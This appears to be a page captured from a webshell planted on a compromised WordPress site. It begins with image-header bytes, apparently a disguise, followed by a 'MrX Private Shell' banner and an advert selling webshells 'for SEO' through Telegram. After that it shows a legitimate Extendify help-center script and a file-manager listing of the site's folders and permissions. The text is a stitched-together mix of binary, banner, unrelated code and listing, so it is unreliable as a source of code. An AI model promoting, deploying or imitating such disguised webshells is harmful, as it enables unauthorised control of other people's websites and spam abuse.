����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { HelpCenter } from '@help-center/HelpCenter';
import { render } from '@shared/lib/dom';
import { isOnLaunch } from '@shared/lib/utils';
import domReady from '@wordpress/dom-ready';
import '@help-center/help-center.css';
import '@help-center/buttons';
const isInsideIframe = () => !!document.querySelector('body.iframe');
domReady(() => {
if (isOnLaunch() || isInsideIframe()) return;
const id = 'extendify-help-center-main';
if (document.getElementById(id)) return;
const helpCenter = Object.assign(document.createElement('div'), {
className: 'extendify-help-center',
id,
});
document.body.append(helpCenter);
render(<HelpCenter />, helpCenter);
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| components | Folder | 0755 |
|
|
| hooks | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| pages | Folder | 0755 |
|
|
| state | Folder | 0755 |
|
|
| tours | Folder | 0755 |
|
|
| HelpCenter.jsx | File | 1.2 KB | 0644 |
|
| buttons.js | File | 1.42 KB | 0644 |
|
| help-center.css | File | 637 B | 0644 |
|
| help-center.js | File | 671 B | 0644 |
|